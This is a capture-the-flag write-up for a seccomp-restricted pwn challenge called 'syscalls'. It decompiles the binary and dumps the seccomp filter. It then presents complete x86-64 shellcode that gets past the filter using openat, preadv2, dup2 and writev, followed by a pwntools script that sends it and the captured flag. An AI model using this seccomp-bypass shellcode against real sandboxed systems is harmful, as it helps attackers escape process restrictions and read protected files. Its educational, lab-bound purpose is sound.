Introduction
Seccomp, or Secure Computing Mode, is a Linux kernel feature used to restrict the system calls a process can make. In this challenge, the binary enforces seccomp filtering, presenting a unique hurdle to perform file I/O operations. The goal is to navigate these restrictions and successfully read the “flag.txt” file.
Overview
This challenge presents a binary with seccomp filtering enabled to restrict the usage of several system calls. The goal is to read the contents of the “flag.txt” file and output it to the standard output stream (stdout) without violating the seccomp rules.
Binary Analysis
Initial Inspection
First let’s check the file type:
syscalls: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=19b78a52059d384f1b4def02d58
38b625773369d, for GNU/Linux 3.2.0, stripped
It’s a stripped 64 bit Linux binary, typical pwn challenge stuff, next let’s check the security of this binary using checksec:
Arch: Â Â Â Â amd64-64-little
RELRO: Â Â Â Full RELRO
Stack: Â Â Â Canary found
NX: Â Â Â Â Â Â NX unknown - GNU_STACK missing
PIE: Â Â Â Â Â PIE enabled
Stack: Â Â Â Executable
RWX: Â Â Â Â Â Has RWX segments
As it seems we have an executable stack and RWX (read, write, execute) segments, this means that we might need to write a shellcode to solve this challenge.
Functions Breakdown
As always let’s decompile the binary using Ghidra.
void main(void) {
long in_FS_OFFSET;
undefined local_c8 [184];
long local_10;
local_10 = *(long *)(in_FS_OFFSET + 0x28);
setvbuf(stdout,(char *)0x0,2,0);
setvbuf(stderr,(char *)0x0,2,0);
setvbuf(stdin,(char *)0x0,2,0);
FUN_00101280(local_c8);
FUN_001012db();
FUN_001012ba(local_c8);
if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return;
}mainfunction:- Sets up buffering for stdout, stderr, and stdin using
setvbuf. - Calls
FUN_00101280with a local buffer (local_c8). - Calls
FUN_001012db. - Calls
FUN_001012bawith the same local buffer. - Includes stack canary checks for security.
- Sets up buffering for stdout, stderr, and stdin using
void FUN_00101280(char *param_1) {
puts(
"The flag is in a file named flag.txt located in the same directory as this binary. That\'s al l the information I can give you."
);
fgets(param_1,0xb0,stdin);
return;
}FUN_00101280function:- Prints a message about the location of the flag file.
- Reads up to 176 (0xb0) characters from stdin into the provided buffer.
int FUN_001012db(void) {
int iVar1;
long in_FS_OFFSET;
undefined2 local_e8 [4];
undefined8 *local_e0;
undefined8 local_d8;
undefined8 local_d0;
undefined8 local_c8;
undefined8 local_c0;
undefined8 local_b8;
undefined8 local_b0;
undefined8 local_a8;
undefined8 local_a0;
undefined8 local_98;
undefined8 local_90;
undefined8 local_88;
undefined8 local_80;
undefined8 local_78;
undefined8 local_70;
undefined8 local_68;
undefined8 local_60;
undefined8 local_58;
undefined8 local_50;
undefined8 local_48;
undefined8 local_40;
undefined8 local_38;
undefined8 local_30;
undefined8 local_28;
undefined8 local_20;
undefined8 local_18;
long local_10;
local_10 = *(long *)(in_FS_OFFSET + 0x28);
local_d8 = 0x400000020;
local_d0 = 0xc000003e16000015;
local_c8 = 0x20;
local_c0 = 0x4000000001000035;
local_b8 = 0xffffffff13000015;
local_b0 = 0x120015;
local_a8 = 0x100110015;
local_a0 = 0x200100015;
local_98 = 0x11000f0015;
local_90 = 0x13000e0015;
local_88 = 0x28000d0015;
local_80 = 0x39000c0015;
local_78 = 0x3b000b0015;
local_70 = 0x113000a0015;
local_68 = 0x12700090015;
local_60 = 0x12800080015;
local_58 = 0x14200070015;
local_50 = 0x1405000015;
local_48 = 0x1400000020;
local_40 = 0x30025;
local_38 = 0x3000015;
local_30 = 0x1000000020;
local_28 = 0x3e801000025;
local_20 = 0x7fff000000000006;
local_18 = 6;
local_e0 = &local_d8;
local_e8[0] = 0x19;
prctl(0x26,1,0,0,0);
iVar1 = prctl(0x16,2,local_e8);
if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return iVar1;
}FUN_001012dbfunction:- Sets up a seccomp-bpf filter.
- Uses
prctlsystem calls to enable seccomp mode and load the filter.
void FUN_001012ba(code *param_1) {
(*param_1)();
return;
}FUN_001012bafunction:- Takes a pointer to code as an argument.
- Executes the code pointed to by the argument.
Now, let’s analyze what this program is doing:
- It starts by setting up unbuffered I/O for stdin, stdout, and stderr.
- It then prints a message about the flag location and reads user input into a buffer.
- Next, it sets up a seccomp filter.
- Finally, it executes the code that was read from user input.
Seccomp
TIP
You can inspect and display the seccomp filter rules applied to the binary using the command:
seccomp-tools dump ./syscallsseccomp-tools
Let’s check the seccomp filters that are enabled:
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x16 0xc000003e if (A != ARCH_X86_64) goto 0024
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x13 0xffffffff if (A != 0xffffffff) goto 0024
0005: 0x15 0x12 0x00 0x00000000 if (A == read) goto 0024
0006: 0x15 0x11 0x00 0x00000001 if (A == write) goto 0024
0007: 0x15 0x10 0x00 0x00000002 if (A == open) goto 0024
0008: 0x15 0x0f 0x00 0x00000011 if (A == pread64) goto 0024
0009: 0x15 0x0e 0x00 0x00000013 if (A == readv) goto 0024
0010: 0x15 0x0d 0x00 0x00000028 if (A == sendfile) goto 0024
0011: 0x15 0x0c 0x00 0x00000039 if (A == fork) goto 0024
0012: 0x15 0x0b 0x00 0x0000003b if (A == execve) goto 0024
0013: 0x15 0x0a 0x00 0x00000113 if (A == splice) goto 0024
0014: 0x15 0x09 0x00 0x00000127 if (A == preadv) goto 0024
0015: 0x15 0x08 0x00 0x00000128 if (A == pwritev) goto 0024
0016: 0x15 0x07 0x00 0x00000142 if (A == execveat) goto 0024
0017: 0x15 0x00 0x05 0x00000014 if (A != writev) goto 0023
0018: 0x20 0x00 0x00 0x00000014 A = fd >> 32 # writev(fd, vec, vlen)
0019: 0x25 0x03 0x00 0x00000000 if (A > 0x0) goto 0023
0020: 0x15 0x00 0x03 0x00000000 if (A != 0x0) goto 0024
0021: 0x20 0x00 0x00 0x00000010 A = fd # writev(fd, vec, vlen)
0022: 0x25 0x00 0x01 0x000003e8 if (A <= 0x3e8) goto 0024
0023: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0024: 0x06 0x00 0x00 0x00000000 return KILL
Here’s a breakdown of the restrictions:
-
Architecture restriction:
- Only allows execution on x86_64 architecture. Any other architecture will result in the process being killed.
-
System call restrictions: The program blocks the following system calls:
read(0)write(1)open(2)pread64(17)readv(19)sendfile(40)fork(57)execve(59)splice(275)preadv(295)pwritev(296)execveat(322)
-
Special case for writev:
- The
writev(20) system call is allowed, but with additional restrictions:- The file descriptor (fd) must be 32-bit (upper 32 bits must be 0)
- The file descriptor must be greater than or equal to
1000(0x3e8)
- The
-
Large system call numbers:
- System call numbers greater than or equal to
0x40000000are not allowed, except for0xffffffff.
- System call numbers greater than or equal to
Exploitation Strategy
Now let’s examine what we have here, Upon running the binary, we observe that it indicates the flag is stored in a file named flag.txt. This clue suggests that the challenge is not about obtaining a shell but rather about performing an Open-Read-Write (ORW) operation. Our objective is to open the flag.txt file, read its contents, and then write them to stdout. However, this task is complicated by several restrictions, primarily that the basic syscalls (open, read, write) are blocked by seccomp. Therefore, we need to identify alternative syscalls to achieve our goal.
TIP
For a comprehensive list of syscalls, you can refer to the following websites:
Identifying Alternative Syscalls
To bypass the restrictions, we focus on syscalls that are not blocked, openat syscall is not blocked and it can be used as an alternative to open, preadv2 is also not blocked, we can use it as an alternative to read, and finally writev is not blocked but it has specific restrictions that we must account for when writing to stdout.
ORW
Opening flag.txt
To open the flag.txt file, we need to place the file path ./flag.txt into memory. This involves pushing the string onto the stack. First, we convert the string into its hexadecimal representation: 2e2f666c61672e747874. Due to the little-endian format, we push it in reverse order.
mov rax, 0x7478
push rax
mov rax, 0x742e67616c662f2e
push raxThis code snippet moves the file path into memory, preparing us to use the openat syscall to open the flag.txt file.
Next, we need to make the openat syscall to open the file and obtain a file descriptor. The openat function signature is as follows, and it specifies the arguments required for the syscall:
int openat(int fd, const char *path, int oflag, ...);TIP
In x86-64 assembly, we pass arguments to syscalls using registers in the following order: RDI, RSI, RDX, RCX, R10, R8.
Here’s the assembly code to set up and execute the openat syscall:
mov rdi, -100 ; Set RDI to -100, which is AT_FDCWD (current working directory)
mov rsi, rsp ; Set RSI to point to the string on the stack
xor rdx, rdx ; Clear RDX (oflag)
xor r10, r10 ; Clear R10 (mode)
mov eax, 257 ; Set EAX to 257, the syscall number for openat
syscall ; Make the syscall to open the file "./flag.txt"The comments above explain’s what each instruction is doing.
Reading flag.txt
After successfully opening the file, the file descriptor is stored in RAX. To read the file, we will use the preadv2 syscall, which is not blocked by seccomp rules. The preadv2 function signature is as follows:
ssize_t preadv2(int fd, const struct iovec *iov, int iovcnt,
                      off_t offset, int flags);Unlike read, preadv2 allows reading data from a file descriptor into multiple buffers at a specified offset, all in a single syscall. This can be more efficient than performing multiple individual read operations. Here’s an explanation of the arguments:
- fd: The file descriptor.
- iov: A pointer to an array of
iovecstructures, each describing a buffer. - iovcnt: The number of
iovecstructures. - offset: The file offset from which to start reading.
- flags: Flags to modify the behavior of the syscall.
The iovec structure is defined as follows:
struct iovec {
void *iov_base; /* Starting address of buffer */
size_t iov_len; /* Number of bytes to transfer */
};An iovec structure contains a pointer to a memory location and the size of that location. To read from the file, we’ll need to set up this structure and use it with the preadv2 syscall.
First, we’ll set the first argument by copying the file descriptor returned by the openat syscall from the RAX register to RDI:
mov rdi, raxNext, we’ll set up the iovec structure using the stack. We’ll push the size 0x100 onto the stack, then push the address of the buffer (also on the stack). Finally, we’ll copy the address of the stack into RSI to set the second argument:
push 0x100 ; Push the buffer size onto the stack
lea rbx, [rsp - 8] ; Load the address of the buffer into RBX
push rbx ; Push the address of the buffer onto the stack
mov rsi, rsp ; Set RSI to point to the iovec structure on the stackWe’ll set the third argument, which is the iovec count, to 1. The last two arguments will be zero. Then, we’ll execute the preadv2 syscall:
mov rdx, 1 ; Set RDX to 1 (iovec count)
xor r10, r10 ; Clear R10 (offset)
xor r8, r8 ; Clear R8 (flags)
mov rax, 0x147 ; Set EAX to 0x147, the syscall number for preadv2
syscall ; Execute the syscallThis setup involves copying the file descriptor from RAX to RDI and preparing the iovec structure by pushing the buffer size onto the stack, loading the buffer address into RBX, pushing the buffer address onto the stack, and setting RSI to point to the iovec structure on the stack. The third argument, RDX, is set to 1, while the fourth and fifth arguments are cleared. Finally, the syscall number for preadv2 is set in EAX, and the syscall is executed to read the file contents into the buffer.
Redirecting stdout to an Authorized File Descriptor
As previously mentioned, due to seccomp restrictions writev only accepts file descriptors that are greater than or equal to 1000. Since stdout and stderr fall below this threshold, we need to redirect stdout to an authorized file descriptor using dup2.
mov rax, 33
mov rdi, 1
mov rsi, 1001
syscallOutputting Content of flag.txt to stdout
To achieve this, we will utilize writev, which shares the same arguments as the syscall:
ssize_t writev(int fildes, const struct iovec *iov, int iovcnt);Given that we have redirected stdout’s file descriptor to 1001, which is within the allowed range specified by seccomp, we will set this as the first argument:
mov rdi, 1001
mov rdx, 1Next, we will define the iovec structure from which writev will read:
push 0x100
lea rbx, [rsp + 8]
push rbx
mov rsi, rspFinally, we will execute the syscall:
mov eax, 0x14
syscallFull Shellcode
mov rax, 0x7478
push rax
mov rax, 0x742e67616c662f2e
push rax
mov rdi, -100
mov rsi, rsp
xor rdx, rdx
xor r10, r10
mov eax, 257
syscall
mov rdi, rax
push 0x100
lea rbx, [rsp - 8]
push rbx
mov rsi, rsp
mov rdx, 1
xor r10, r10
xor r8, r8
mov rax, 0x147
syscall
mov rax, 33
mov rdi, 1
mov rsi, 1001
syscall
mov rdi, 1001
mov rdx, 1
push 0x100
lea rbx, [rsp + 8]
push rbx
mov rsi, rsp
mov eax, 0x14
syscallSending the shellcode
After writing the shellcode we’ll need to compile it and send it to the binary, we’ve used pwntools for that, and here’s a script the does just that:
from pwn import *
context.log_level = 'debug'
context.binary = ELF("./syscalls", checksec=False)
# io = process("ncat --ssl syscalls.chal.uiuc.tf 1337".split(" "))
io = process('./syscalls')
shellcode = open('shellcode.asm', 'r').read()
payload = asm(shellcode)
io.recvuntil(b'give you.\n')
io.sendline(payload)
output = io.recvuntil(b'}').decode()
print(f'Flag: {output}')Finally here’s the flag: uiuctf{a532aaf9aaed1fa5906de364a1162e0833c57a0246ab9ffc}